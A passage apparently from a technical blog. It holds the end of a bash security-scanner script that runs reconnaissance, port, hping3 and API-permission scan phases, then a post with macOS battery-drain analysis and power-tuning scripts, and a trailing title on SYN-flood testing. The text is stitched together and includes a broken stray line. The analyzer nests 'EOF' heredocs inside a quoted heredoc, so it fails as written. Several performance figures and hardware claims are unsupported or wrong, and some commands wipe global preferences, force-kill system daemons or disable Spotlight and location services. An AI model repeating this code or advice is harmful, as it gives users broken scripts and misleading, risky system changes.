$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`
---
## 2. Permission Testing
### 2.1 Unauthenticated Access
\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No unauthenticated access issues")
\`\`\`
### 2.2 HTTP Method Issues
\`\`\`
$(cat api_permissions/method_issues.txt 2>/dev/null || echo "No method issues found")
\`\`\`
---
## 3. CORS Configuration
\`\`\`
$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS issues found")
\`\`\`
---
**END OF API SECURITY REPORT**
EOF
log_success "API security report generated: $API_REPORT"
log_debug "API security report saved to: $SCAN_DIR/$API_REPORT"
}
################################################################################
# Main Execution
################################################################################
main() {
echo "========================================"
echo "Enhanced Security Scanner v${VERSION}"
echo "========================================"
echo
log_debug "Script started at $(date)"
log_debug "Network interface: $NETWORK_INTERFACE"
log_debug "Debug mode: $DEBUG"
echo
# Check dependencies
check_dependencies
# Initialize scan
initialize_scan
# Run scans
log_debug "Starting DNS reconnaissance phase"
dns_reconnaissance
log_debug "Starting subdomain discovery phase"
discover_subdomains
log_debug "Starting SSL/TLS analysis phase"
ssl_tls_analysis
log_debug "Starting port scanning phase"
port_scanning
if [ "$VULN_SCAN" = true ]; then
log_debug "Starting vulnerability scanning phase"
vulnerability_scanning
fi
log_debug "Starting hping3 testing phase"
hping3_testing
log_debug "Starting asset discovery phase"
asset_discovery
log_debug "Starting old software detection phase"
detect_old_software
if [ "$API_SCAN" = true ]; then
log_debug "Starting API discovery phase"
api_discovery
log_debug "Starting API permission testing phase"
api_permission_testing
fi
log_debug "Starting HTTP security headers analysis phase"
http_security_headers
log_debug "Starting subdomain scanning phase"
scan_subdomains
# Generate reports
log_debug "Starting report generation phase"
generate_executive_summary
generate_technical_report
generate_vulnerability_report
generate_api_report
# Summary
echo
echo "========================================"
log_success "Scan Complete!"
echo "========================================"
echo
log_info "Scan directory: $SCAN_DIR"
log_info "Executive summary: $SCAN_DIR/$EXEC_REPORT"
log_info "Technical report: $SCAN_DIR/$TECH_REPORT"
if [ "$VULN_SCAN" = true ]; then
log_info "Vulnerability report: $SCAN_DIR/$VULN_REPORT"
fi
if [ "$API_SCAN" = true ]; then
log_info "API security report: $SCAN_DIR/$API_REPORT"
fi
echo
log_info "Review the reports for detailed findings"
log_debug "Script completed at $(date)"
}
################################################################################
# Parse Command Line Arguments
################################################################################
DOMAIN=""
SCAN_SUBDOMAINS=false
MAX_SUBDOMAINS=10
VULN_SCAN=false
API_SCAN=false
while getopts "d:sm:vah" opt; do
case $opt in
d)
DOMAIN="$OPTARG"
;;
s)
SCAN_SUBDOMAINS=true
;;
m)
MAX_SUBDOMAINS="$OPTARG"
;;
v)
VULN_SCAN=true
;;
a)
API_SCAN=true
;;
h)
usage
;;
\?)
log_error "Invalid option: -$OPTARG"
usage
;;
esac
done
# Validate required arguments
if [ -z "$DOMAIN" ]; then
log_error "Domain is required"
usage
fi
# Run main function
main
echo "${HEADERS[$header]}: Present" >>
EOF
chmod +x ./security_scanner_enhanced.sh

Macbook: A script to figure out which processes are causing battery usuage/drain issues (even when the laptop lid is closed)

If you’re trying to figure out whats draining your macbook, even when the lid is closed – then try the script below (call with “sudo ./battery_drain_analyzer.sh”):

cat > ~/battery_drain_analyzer.sh << 'EOF'
#!/bin/bash
# Battery Drain Analyzer for macOS
# This script analyzes processes and settings that affect battery life,
# especially when the laptop lid is closed.
# Colors for terminal output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color
# Output file
REPORT_FILE="battery_drain_report_$(date +%Y%m%d_%H%M%S).md"
TEMP_DIR=$(mktemp -d)
echo -e "${GREEN}Battery Drain Analyzer${NC}"
echo "Collecting system information..."
echo "This may take a minute and will require administrator privileges for some checks."
echo ""
# Function to check if running with sudo
check_sudo() {
if [[ $EUID -ne 0 ]]; then
echo -e "${YELLOW}Some metrics require sudo access. Re-running with sudo...${NC}"
sudo "$0" "$@"
exit $?
fi
}
# Start the report
cat > "$REPORT_FILE" << EOF
# Battery Drain Analysis Report
**Generated:** $(date '+%Y-%m-%d %H:%M:%S %Z')  
**System:** $(sysctl -n hw.model)  
**macOS Version:** $(sw_vers -productVersion)  
**Uptime:** $(uptime | sed 's/.*up //' | sed 's/,.*//')
---
## Executive Summary
This report analyzes processes and settings that consume battery power, particularly when the laptop lid is closed.
EOF
# 1. Check current power assertions
echo "Checking power assertions..."
cat >> "$REPORT_FILE" << EOF
## 🔋 Current Power State
### Active Power Assertions
Power assertions prevent your Mac from sleeping. Here's what's currently active:
\`\`\`
EOF
pmset -g assertions | grep -A 20 "Listed by owning process:" >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"
# 2. Check sleep prevention
SLEEP_STATUS=$(pmset -g | grep "sleep" | head -1)
if [[ $SLEEP_STATUS == *"sleep prevented"* ]]; then
echo "" >> "$REPORT_FILE"
echo "⚠️ **WARNING:** Sleep is currently being prevented!" >> "$REPORT_FILE"
fi
# 3. Analyze power settings
echo "Analyzing power settings..."
cat >> "$REPORT_FILE" << EOF
## ⚙️ Power Management Settings
### Current Power Profile
\`\`\`
EOF
pmset -g >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"
# Identify problematic settings
cat >> "$REPORT_FILE" << EOF
### Problematic Settings for Battery Life
EOF
POWERNAP=$(pmset -g | grep "powernap" | awk '{print $2}')
TCPKEEPALIVE=$(pmset -g | grep "tcpkeepalive" | awk '{print $2}')
WOMP=$(pmset -g | grep "womp" | awk '{print $2}')
STANDBY=$(pmset -g | grep "standby" | awk '{print $2}')
if [[ "$POWERNAP" == "1" ]]; then
echo "- ❌ **Power Nap is ENABLED** - Allows Mac to wake for updates (HIGH battery drain)" >> "$REPORT_FILE"
else
echo "- ✅ Power Nap is disabled" >> "$REPORT_FILE"
fi
if [[ "$TCPKEEPALIVE" == "1" ]]; then
echo "- ⚠️ **TCP Keep-Alive is ENABLED** - Maintains network connections during sleep (MEDIUM battery drain)" >> "$REPORT_FILE"
else
echo "- ✅ TCP Keep-Alive is disabled" >> "$REPORT_FILE"
fi
if [[ "$WOMP" == "1" ]]; then
echo "- ⚠️ **Wake on LAN is ENABLED** - Allows network wake (MEDIUM battery drain)" >> "$REPORT_FILE"
else
echo "- ✅ Wake on LAN is disabled" >> "$REPORT_FILE"
fi
# 4. Collect CPU usage data
echo "Collecting CPU usage data..."
cat >> "$REPORT_FILE" << EOF
## 📊 Top Battery-Draining Processes
### Current CPU Usage (Higher CPU = More Battery Drain)
EOF
# Get top processes by CPU
top -l 2 -n 20 -o cpu -stats pid,command,cpu,mem,purg,user | tail -n 21 > "$TEMP_DIR/top_output.txt"
# Parse and format top output
echo "| PID | Process | CPU % | Memory | User |" >> "$REPORT_FILE"
echo "|-----|---------|-------|--------|------|" >> "$REPORT_FILE"
tail -n 20 "$TEMP_DIR/top_output.txt" | while read line; do
if [[ ! -z "$line" ]] && [[ "$line" != *"PID"* ]]; then
PID=$(echo "$line" | awk '{print $1}')
PROCESS=$(echo "$line" | awk '{print $2}' | cut -c1-30)
CPU=$(echo "$line" | awk '{print $3}')
MEM=$(echo "$line" | awk '{print $4}')
USER=$(echo "$line" | awk '{print $NF}')
# Highlight high CPU processes
# Use awk for floating point comparison to avoid bc dependency
if awk "BEGIN {exit !($CPU > 10.0)}" 2>/dev/null; then
echo "| $PID | **$PROCESS** | **$CPU** | $MEM | $USER |" >> "$REPORT_FILE"
else
echo "| $PID | $PROCESS | $CPU | $MEM | $USER |" >> "$REPORT_FILE"
fi
fi
done
# 5. Check for power metrics (if available with sudo)
if [[ $EUID -eq 0 ]]; then
echo "Collecting detailed power metrics..."
cat >> "$REPORT_FILE" << EOF
### Detailed Power Consumption Analysis
EOF
# Run powermetrics for 2 seconds
powermetrics --samplers tasks --show-process-energy -i 2000 -n 1 2>/dev/null > "$TEMP_DIR/powermetrics.txt"
if [[ -s "$TEMP_DIR/powermetrics.txt" ]]; then
echo '```' >> "$REPORT_FILE"
grep -A 30 -F "*** Running tasks ***" "$TEMP_DIR/powermetrics.txt" | head -35 >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"
fi
fi
# 6. Check wake reasons
echo "Analyzing wake patterns..."
cat >> "$REPORT_FILE" << EOF
## 💤 Sleep/Wake Analysis
### Recent Wake Events
These events show why your Mac woke from sleep:
\`\`\`
EOF
pmset -g log | grep -E "Wake from|DarkWake|Notification" | tail -10 >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"
# 7. Check scheduled wake events
cat >> "$REPORT_FILE" << EOF
### Scheduled Wake Requests
These are processes that have requested to wake your Mac:
\`\`\`
EOF
pmset -g log | grep "Wake Requests" | tail -5 >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"
# 8. Background services analysis
echo "Analyzing background services..."
cat >> "$REPORT_FILE" << EOF
## 🔄 Background Services Analysis
### Potentially Problematic Services
EOF
# Check for common battery-draining services
SERVICES_TO_CHECK=(
"Spotlight:mds_stores"
"Time Machine:backupd"
"Photos:photoanalysisd"
"iCloud:bird"
"CrowdStrike:falcon"
"Dropbox:Dropbox"
"Google Drive:Google Drive"
"OneDrive:OneDrive"
"Creative Cloud:Creative Cloud"
"Docker:com.docker"
"Parallels:prl_"
"VMware:vmware"
"Spotify:Spotify"
"Slack:Slack"
"Microsoft Teams:Teams"
"Zoom:zoom.us"
"Chrome:Google Chrome"
"Edge:Microsoft Edge"
)
echo "| Service | Status | Impact |" >> "$REPORT_FILE"
echo "|---------|--------|--------|" >> "$REPORT_FILE"
for service in "${SERVICES_TO_CHECK[@]}"; do
IFS=':' read -r display_name process_name <<< "$service"
# Use pgrep with fixed string matching to avoid regex issues
if pgrep -qfi "$process_name" 2>/dev/null; then
# Get CPU usage for this process (escape special characters)
escaped_name=$(printf '%s\n' "$process_name" | sed 's/[[\.*^$()+?{|]/\\&/g')
CPU_USAGE=$(ps aux | grep -i "$escaped_name" | grep -v grep | awk '{sum+=$3} END {print sum}')
if [[ -z "$CPU_USAGE" ]]; then
CPU_USAGE="0"
fi
# Determine impact level
# Use awk for floating point comparison
if awk "BEGIN {exit !($CPU_USAGE > 20.0)}" 2>/dev/null; then
IMPACT="HIGH ⚠️"
elif awk "BEGIN {exit !($CPU_USAGE > 5.0)}" 2>/dev/null; then
IMPACT="MEDIUM"
else
IMPACT="LOW"
fi
echo "| $display_name | Running (${CPU_USAGE}% CPU) | $IMPACT |" >> "$REPORT_FILE"
fi
done
# 9. Battery health check
echo "Checking battery health..."
cat >> "$REPORT_FILE" << EOF
## 🔋 Battery Health Status
\`\`\`
EOF
system_profiler SPPowerDataType | grep -A 20 "Battery Information:" >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"
# 10. Recommendations
cat >> "$REPORT_FILE" << EOF
## 💡 Recommendations
### Immediate Actions to Improve Battery Life
#### Critical (Do These First):
EOF
# Generate recommendations based on findings
if [[ "$POWERNAP" == "1" ]]; then
cat >> "$REPORT_FILE" << EOF
1. **Disable Power Nap**
\`\`\`bash
sudo pmset -a powernap 0
\`\`\`
EOF
fi
if [[ "$TCPKEEPALIVE" == "1" ]]; then
cat >> "$REPORT_FILE" << EOF
2. **Disable TCP Keep-Alive**
\`\`\`bash
sudo pmset -a tcpkeepalive 0
\`\`\`
EOF
fi
if [[ "$WOMP" == "1" ]]; then
cat >> "$REPORT_FILE" << EOF
3. **Disable Wake for Network Access**
\`\`\`bash
sudo pmset -a womp 0
\`\`\`
EOF
fi
cat >> "$REPORT_FILE" << EOF
#### Additional Optimizations:
4. **Reduce Display Sleep Time**
\`\`\`bash
sudo pmset -a displaysleep 5
\`\`\`
5. **Enable Automatic Graphics Switching** (if available)
\`\`\`bash
sudo pmset -a gpuswitch 2
\`\`\`
6. **Set Faster Standby Delay**
\`\`\`bash
sudo pmset -a standbydelay 1800  # 30 minutes
\`\`\`
### Process-Specific Recommendations:
EOF
# Check for specific high-drain processes and provide detailed solutions
if pgrep -q "mds_stores" 2>/dev/null; then
cat >> "$REPORT_FILE" << EOF
#### 🔍 **Spotlight Indexing Detected**
**Problem:** Spotlight is actively indexing your drive, consuming significant CPU and battery.
**Solutions:**
- **Temporary pause:** \`sudo mdutil -a -i off\` (re-enable with \`on\`)
- **Check indexing status:** \`mdutil -s /\`
- **Rebuild index if stuck:** \`sudo mdutil -E /\`
- **Exclude folders:** System Settings > Siri & Spotlight > Spotlight Privacy
EOF
fi
if pgrep -q "backupd" 2>/dev/null; then
cat >> "$REPORT_FILE" << EOF
#### 💾 **Time Machine Backup Running**
**Problem:** Active backup consuming resources.
**Solutions:**
- **Skip current backup:** Click Time Machine icon > Skip This Backup
- **Schedule for AC power:** \`sudo defaults write /Library/Preferences/com.apple.TimeMachine RequiresACPower -bool true\`
- **Reduce backup frequency:** Use TimeMachineEditor app
- **Check backup size:** \`tmutil listbackups | tail -1 | xargs tmutil calculatedrift\`
EOF
fi
if pgrep -q "photoanalysisd" 2>/dev/null; then
cat >> "$REPORT_FILE" << EOF
#### 📸 **Photos Library Analysis Active**
**Problem:** Photos app analyzing images for faces, objects, and scenes.
**Solutions:**
- **Pause temporarily:** Quit Photos app completely
- **Disable features:** Photos > Settings > uncheck "Enable Machine Learning"
- **Process overnight:** Leave Mac plugged in overnight to complete
- **Check progress:** Activity Monitor > Search "photo"
EOF
fi
# Check for additional common issues
if pgrep -q "kernel_task" 2>/dev/null && [[ $(ps aux | grep "kernel_task" | grep -v grep | awk '{print $3}' | cut -d. -f1) -gt 50 ]]; then
cat >> "$REPORT_FILE" << EOF
#### 🔥 **High kernel_task CPU Usage**
**Problem:** System thermal management or driver issues.
**Solutions:**
- **Reset SMC:** Shut down > Press & hold Shift-Control-Option-Power for 10s
- **Check temperatures:** \`sudo powermetrics --samplers smc | grep temp\`
- **Disconnect peripherals:** Especially USB-C hubs and external displays
- **Update macOS:** Check for system updates
- **Safe mode test:** Restart holding Shift key
EOF
fi
if pgrep -q "WindowServer" 2>/dev/null && [[ $(ps aux | grep "WindowServer" | grep -v grep | awk '{print $3}' | cut -d. -f1) -gt 30 ]]; then
cat >> "$REPORT_FILE" << EOF
#### 🖥️ **High WindowServer Usage**
**Problem:** Graphics rendering issues or display problems.
**Solutions:**
- **Reduce transparency:** System Settings > Accessibility > Display > Reduce transparency
- **Close visual apps:** Quit apps with animations or video
- **Reset display settings:** Option-click Scaled in Display settings
- **Disable display sleep prevention:** \`pmset -g assertions | grep -i display\`
EOF
fi
# 11. Battery drain score
echo "Calculating battery drain score..."
cat >> "$REPORT_FILE" << EOF
## 📈 Overall Battery Drain Score
EOF
# Calculate score (0-100, where 100 is worst)
SCORE=0
[[ "$POWERNAP" == "1" ]] && SCORE=$((SCORE + 30))
[[ "$TCPKEEPALIVE" == "1" ]] && SCORE=$((SCORE + 15))
[[ "$WOMP" == "1" ]] && SCORE=$((SCORE + 10))
# Add points for running services
pgrep -q "mds_stores" 2>/dev/null && SCORE=$((SCORE + 10))
pgrep -q "backupd" 2>/dev/null && SCORE=$((SCORE + 10))
pgrep -q "photoanalysisd" 2>/dev/null && SCORE=$((SCORE + 5))
pgrep -q "falcon" 2>/dev/null && SCORE=$((SCORE + 10))
# Determine rating
if [[ $SCORE -lt 20 ]]; then
RATING="✅ **EXCELLENT** - Minimal battery drain expected"
elif [[ $SCORE -lt 40 ]]; then
RATING="👍 **GOOD** - Some optimization possible"
elif [[ $SCORE -lt 60 ]]; then
RATING="⚠️ **FAIR** - Noticeable battery drain"
else
RATING="❌ **POOR** - Significant battery drain"
fi
cat >> "$REPORT_FILE" << EOF
**Battery Drain Score: $SCORE/100**  
**Rating: $RATING**
Higher scores indicate more battery drain. A score above 40 suggests optimization is needed.
---
## 📝 How to Use This Report
1. Review the **Executive Summary** for quick insights
2. Check **Problematic Settings** and apply recommended fixes
3. Identify high CPU processes in the **Top Battery-Draining Processes** section
4. Follow the **Recommendations** in order of priority
5. Re-run this script after making changes to measure improvement
## 🛠️ Common Battery Issues & Solutions
### 🔴 Critical Issues (Fix Immediately)
#### Sleep Prevention Issues
**Symptoms:** Mac won't sleep, battery drains with lid closed
**Diagnosis:** \`pmset -g assertions\`
**Solutions:**
- Kill preventing apps: \`pmset -g assertions | grep -i prevent\`
- Force sleep: \`pmset sleepnow\`
- Reset power management: \`sudo pmset -a restoredefaults\`
#### Runaway Processes
**Symptoms:** Fan running constantly, Mac gets hot, rapid battery drain
**Diagnosis:** \`top -o cpu\` or Activity Monitor
**Solutions:**
- Force quit: \`kill -9 [PID]\` or Activity Monitor > Force Quit
- Disable startup items: System Settings > General > Login Items
- Clean launch agents: \`ls ~/Library/LaunchAgents\`
### 🟡 Common Issues
#### Bluetooth Battery Drain
**Problem:** Bluetooth constantly searching for devices
**Solutions:**
- Reset Bluetooth module: Shift+Option click BT icon > Reset
- Remove unused devices: System Settings > Bluetooth
- Disable when not needed: \`sudo defaults write /Library/Preferences/com.apple.Bluetooth ControllerPowerState 0\`
#### Safari/Chrome High Energy Use
**Problem:** Browser tabs consuming excessive resources
**Solutions:**
- Use Safari over Chrome (more efficient on Mac)
- Install ad blockers to reduce JavaScript load
- Limit tabs: Use OneTab or similar extension
- Disable auto-play: Safari > Settings > Websites > Auto-Play
#### External Display Issues
**Problem:** Discrete GPU activation draining battery
**Solutions:**
- Use single display when on battery
- Lower resolution: System Settings > Displays
- Use clamshell mode efficiently
- Check GPU: \`pmset -g\` look for gpuswitch
#### Cloud Sync Services
**Problem:** Continuous syncing draining battery
**Solutions:**
- **iCloud:** System Settings > Apple ID > iCloud > Optimize Mac Storage
- **Dropbox:** Pause sync or use selective sync
- **OneDrive:** Pause syncing when on battery
- **Google Drive:** File Stream > Preferences > Bandwidth settings
### 🟢 Preventive Measures
#### Daily Habits
- Close apps instead of just minimizing
- Disconnect peripherals when not in use
- Use Safari for better battery life
- Enable Low Power Mode when unplugged
- Reduce screen brightness (saves 10-20% battery)
#### Weekly Maintenance
- Restart Mac weekly to clear memory
- Check Activity Monitor for unusual processes
- Update apps and macOS regularly
- Clear browser cache and cookies
- Review login items and launch agents
#### Monthly Checks
- Calibrate battery (full discharge and charge)
- Clean fans and vents for better cooling
- Review and remove unused apps
- Check storage (full drives impact performance)
- Run Disk Utility First Aid
### Quick Fix Scripts
#### 🚀 Basic Optimization (Safe)
Save and run this script to apply all recommended power optimizations:
\`\`\`bash
#!/bin/bash
# Apply all power optimizations
sudo pmset -a powernap 0
sudo pmset -a tcpkeepalive 0
sudo pmset -a womp 0
sudo pmset -a standbydelay 1800
sudo pmset -a displaysleep 5
sudo pmset -a hibernatemode 3
sudo pmset -a autopoweroff 1
sudo pmset -a autopoweroffdelay 28800
echo "Power optimizations applied!"
\`\`\`
#### 💪 Aggressive Battery Saving
For maximum battery life (may affect convenience):
\`\`\`bash
#!/bin/bash
# Aggressive battery saving settings
sudo pmset -b displaysleep 2
sudo pmset -b disksleep 10
sudo pmset -b sleep 5
sudo pmset -b powernap 0
sudo pmset -b tcpkeepalive 0
sudo pmset -b womp 0
sudo pmset -b ttyskeepawake 0
sudo pmset -b gpuswitch 0  # Force integrated GPU
sudo pmset -b hibernatemode 25  # Hibernate only mode
echo "Aggressive battery settings applied!"
\`\`\`
#### 🔄 Reset to Defaults
To restore factory power settings:
\`\`\`bash
#!/bin/bash
sudo pmset -a restoredefaults
echo "Power settings restored to defaults"
\`\`\`
---
*Report generated by Battery Drain Analyzer v1.0*
EOF
# Cleanup
rm -rf "$TEMP_DIR"
# Summary
echo ""
echo -e "${GREEN}✅ Analysis Complete!${NC}"
echo "Report saved to: $REPORT_FILE"
echo ""
echo "Key findings:"
[[ "$POWERNAP" == "1" ]] && echo -e "${RED}  ❌ Power Nap is enabled (HIGH drain)${NC}"
[[ "$TCPKEEPALIVE" == "1" ]] && echo -e "${YELLOW}  ⚠️ TCP Keep-Alive is enabled (MEDIUM drain)${NC}"
[[ "$WOMP" == "1" ]] && echo -e "${YELLOW}  ⚠️ Wake on LAN is enabled (MEDIUM drain)${NC}"
echo ""
echo "To view the full report:"
echo "  cat $REPORT_FILE"
echo ""
echo "To apply all recommended fixes:"
echo "  sudo pmset -a powernap 0 tcpkeepalive 0 womp 0"
EOF
chmod +x ~/battery_drain_analyzer.sh

If you see windowServer as your top consumer then consider the following:

# 1. Restart WindowServer (logs you out!)
sudo killall -HUP WindowServer
# 2. Reduce transparency
defaults write com.apple.universalaccess reduceTransparency -bool true
# 3. Disable animations
defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false
# 4. Reset display preferences
rm ~/Library/Preferences/com.apple.windowserver.plist

Finer grained optimisations:

#!/bin/bash
echo "🔧 Applying ALL WindowServer Optimizations for M3 MacBook Pro..."
echo "This will reduce power consumption significantly"
echo ""
# ============================================
# VISUAL EFFECTS & ANIMATIONS (30-40% reduction)
# ============================================
echo "Disabling visual effects and animations..."
# Reduce transparency and motion
defaults write com.apple.universalaccess reduceTransparency -bool true
defaults write com.apple.universalaccess reduceMotion -bool true
defaults write com.apple.Accessibility ReduceMotionEnabled -int 1
# Disable smooth scrolling and window animations
defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false
defaults write NSGlobalDomain NSScrollAnimationEnabled -bool false
defaults write NSGlobalDomain NSScrollViewRubberbanding -bool false
defaults write NSGlobalDomain NSWindowResizeTime -float 0.001
defaults write NSGlobalDomain NSDocumentRevisionsWindowTransformAnimation -bool false
defaults write NSGlobalDomain NSToolbarFullScreenAnimationDuration -float 0
defaults write NSGlobalDomain NSBrowserColumnAnimationSpeedMultiplier -float 0
# Dock optimizations
defaults write com.apple.dock autohide-time-modifier -float 0
defaults write com.apple.dock launchanim -bool false
defaults write com.apple.dock mineffect -string "scale"
defaults write com.apple.dock show-recents -bool false
defaults write com.apple.dock expose-animation-duration -float 0.1
defaults write com.apple.dock hide-mirror -bool true
# Mission Control optimizations
defaults write com.apple.dock expose-group-by-app -bool false
defaults write com.apple.dock mru-spaces -bool false
defaults write com.apple.dock dashboard-in-overlay -bool true
# Finder optimizations
defaults write com.apple.finder DisableAllAnimations -bool true
defaults write com.apple.finder AnimateWindowZoom -bool false
defaults write com.apple.finder AnimateInfoPanes -bool false
defaults write com.apple.finder FXEnableSlowAnimation -bool false
# Quick Look animations
defaults write -g QLPanelAnimationDuration -float 0
# Mail animations
defaults write com.apple.mail DisableReplyAnimations -bool true
defaults write com.apple.mail DisableSendAnimations -bool true
# ============================================
# M3-SPECIFIC OPTIMIZATIONS (10-15% reduction)
# ============================================
echo "Applying M3-specific optimizations..."
# Disable font smoothing (M3 handles text well without it)
defaults -currentHost write NSGlobalDomain AppleFontSmoothing -int 0
defaults write NSGlobalDomain CGFontRenderingFontSmoothingDisabled -bool true
# Optimize for battery when unplugged
sudo pmset -b gpuswitch 0  # Use efficiency cores more
sudo pmset -b lessbright 1 # Slightly dim display on battery
sudo pmset -b displaysleep 5  # Faster display sleep
# Reduce background rendering
defaults write NSGlobalDomain NSQuitAlwaysKeepsWindows -bool false
defaults write NSGlobalDomain NSDisableAutomaticTermination -bool true
# ============================================
# BROWSER OPTIMIZATIONS (15-25% reduction)
# ============================================
echo "Optimizing browsers..."
# Chrome optimizations
defaults write com.google.Chrome DisableHardwareAcceleration -bool true
defaults write com.google.Chrome CGDisableCoreAnimation -bool true
defaults write com.google.Chrome RendererProcessLimit -int 2
defaults write com.google.Chrome NSQuitAlwaysKeepsWindows -bool false
# Safari optimizations (more efficient than Chrome)
defaults write com.apple.Safari WebKitAcceleratedCompositingEnabled -bool false
defaults write com.apple.Safari WebKitWebGLEnabled -bool false
defaults write com.apple.Safari WebKit2WebGLEnabled -bool false
# Stable browser (if Chromium-based)
defaults write com.stable.browser DisableHardwareAcceleration -bool true
# ============================================
# ADVANCED WINDOWSERVER TWEAKS (5-10% reduction)
# ============================================
echo "Applying advanced WindowServer tweaks..."
# Reduce compositor update rate
defaults write com.apple.WindowManager StandardHideDelay -int 0
defaults write com.apple.WindowManager StandardHideTime -int 0
defaults write com.apple.WindowManager EnableStandardClickToShowDesktop -bool false
# Reduce shadow calculations
defaults write NSGlobalDomain NSUseLeopardWindowShadow -bool true
# Disable Dashboard
defaults write com.apple.dashboard mcx-disabled -bool true
# Menu bar transparency
defaults write NSGlobalDomain AppleEnableMenuBarTransparency -bool false
# ============================================
# DISPLAY SETTINGS (20-30% reduction)
# ============================================
echo "Optimizing display settings..."
# Enable automatic brightness adjustment
sudo defaults write /Library/Preferences/com.apple.iokit.AmbientLightSensor "Automatic Display Enabled" -bool true
# Power management settings
sudo pmset -a displaysleep 5
sudo pmset -a disksleep 10
sudo pmset -a sleep 15
sudo pmset -a hibernatemode 3
sudo pmset -a autopoweroff 1
sudo pmset -a autopoweroffdelay 28800
# ============================================
# BACKGROUND SERVICES
# ============================================
echo "Optimizing background services..."
# Reduce Spotlight activity
sudo mdutil -a -i off  # Temporarily disable, re-enable with 'on'
# Limit background app refresh
defaults write NSGlobalDomain NSAppSleepDisabled -bool false
# ============================================
# APPLY ALL CHANGES
# ============================================
echo "Applying changes..."
# Restart affected services
killall Dock
killall Finder
killall SystemUIServer
killall Mail 2>/dev/null
killall Safari 2>/dev/null
killall "Google Chrome" 2>/dev/null
echo ""
echo "✅ All optimizations applied!"
echo ""
echo "📊 Expected improvements:"
echo "  • WindowServer CPU: 4.5% → 1-2%"
echo "  • Battery life gain: +1-2 hours"
echo "  • GPU power reduction: ~30-40%"
echo ""
echo "⚠️  IMPORTANT: Please log out and back in for all changes to take full effect"
echo ""
echo "💡 To monitor WindowServer usage:"
echo "   ps aux | grep WindowServer | grep -v grep | awk '{print \$3\"%\"}'"
echo ""
echo "🔄 To revert all changes, run:"
echo "   defaults delete com.apple.universalaccess"
echo "   defaults delete NSGlobalDomain"
echo "   defaults delete com.apple.dock"
echo "   killall Dock && killall Finder"

To optimise the power when the lid is closed, below are some options:

#!/bin/bash
echo "🔋 Applying CRITICAL closed-lid battery optimizations for M3 MacBook Pro..."
echo "These settings specifically target battery drain when lid is closed"
echo ""
# ============================================
# #1 HIGHEST IMPACT (50-70% reduction when lid closed)
# ============================================
echo "1️⃣ Disabling Power Nap (HIGHEST IMPACT - stops wake for updates)..."
sudo pmset -a powernap 0
echo "2️⃣ Disabling TCP Keep-Alive (HIGH IMPACT - stops network maintenance)..."
sudo pmset -a tcpkeepalive 0
echo "3️⃣ Disabling Wake for Network Access (HIGH IMPACT - prevents network wakes)..."
sudo pmset -a womp 0
# ============================================
# #2 HIGH IMPACT (20-30% reduction)
# ============================================
echo "4️⃣ Setting aggressive sleep settings..."
# When on battery, sleep faster and deeper
sudo pmset -b sleep 1                    # Sleep after 1 minute of inactivity
sudo pmset -b disksleep 5                # Spin down disk after 5 minutes
sudo pmset -b hibernatemode 25           # Hibernate only (no sleep+RAM power)
sudo pmset -b standbydelay 300           # Enter standby after 5 minutes
sudo pmset -b autopoweroff 1             # Enable auto power off
sudo pmset -b autopoweroffdelay 900      # Power off after 15 minutes
echo "5️⃣ Disabling wake features..."
sudo pmset -a ttyskeepawake 0           # Don't wake for terminal sessions
sudo pmset -a lidwake 0                  # Don't wake on lid open (until power button)
sudo pmset -a acwake 0                   # Don't wake on AC attach
# ============================================
# #3 MEDIUM IMPACT (10-20% reduction)
# ============================================
echo "6️⃣ Disabling background services that wake the system..."
# Disable Bluetooth wake
sudo defaults write /Library/Preferences/com.apple.Bluetooth.plist ControllerPowerState 0
# Disable Location Services wake
sudo defaults write /Library/Preferences/com.apple.locationd.plist LocationServicesEnabled -bool false
# Disable Find My wake events
sudo pmset -a proximityWake 0 2>/dev/null
# Disable Handoff/Continuity features that might wake
sudo defaults write com.apple.Handoff HandoffEnabled -bool false
# ============================================
# #4 SPECIFIC WAKE PREVENTION (5-10% reduction)
# ============================================
echo "7️⃣ Preventing specific wake events..."
# Disable scheduled wake events
sudo pmset repeat cancel
# Clear any existing scheduled events
sudo pmset schedule cancelall
# Disable DarkWake (background wake without display)
sudo pmset -a darkwakes 0 2>/dev/null
# Disable wake for Time Machine
sudo defaults write /Library/Preferences/com.apple.TimeMachine.plist RequiresACPower -bool true
# ============================================
# #5 BACKGROUND APP PREVENTION
# ============================================
echo "8️⃣ Stopping apps from preventing sleep..."
# Kill processes that commonly prevent sleep
killall -9 photoanalysisd 2>/dev/null
killall -9 mds_stores 2>/dev/null
killall -9 backupd 2>/dev/null
# Disable Spotlight indexing when on battery
sudo mdutil -a -i off
# Disable Photos analysis
launchctl disable user/$UID/com.apple.photoanalysisd
# ============================================
# VERIFY SETTINGS
# ============================================
echo ""
echo "✅ Closed-lid optimizations complete! Verifying..."
echo ""
echo "Current problematic settings status:"
pmset -g | grep -E "powernap|tcpkeepalive|womp|sleep|hibernatemode|standby|lidwake"
echo ""
echo "Checking what might still wake your Mac:"
pmset -g assertions | grep -i "prevent"
echo ""
echo "==============================================="
echo "🎯 EXPECTED RESULTS WITH LID CLOSED:"
echo "  • Battery drain: 1-2% per hour (down from 5-10%)"
echo "  • No wake events except opening lid + pressing power"
echo "  • Background services completely disabled"
echo ""
echo "⚠️ TRADE-OFFS:"
echo "  • No email/message updates with lid closed"
echo "  • No Time Machine backups on battery"
echo "  • Must press power button after opening lid"
echo "  • Handoff/AirDrop disabled"
echo ""
echo "🔄 TO RESTORE CONVENIENCE FEATURES:"
echo "sudo pmset -a powernap 1 tcpkeepalive 1 womp 1 lidwake 1"
echo "sudo pmset -b hibernatemode 3 standbydelay 10800"
echo "sudo mdutil -a -i on"
echo ""
echo "📊 TEST YOUR BATTERY DRAIN:"
echo "1. Note battery % and close lid"
echo "2. Wait 1 hour"
echo "3. Open and check battery %"
echo "4. Should lose only 1-2%"

Testing your sites SYN flood resistance using hping3 in parallel

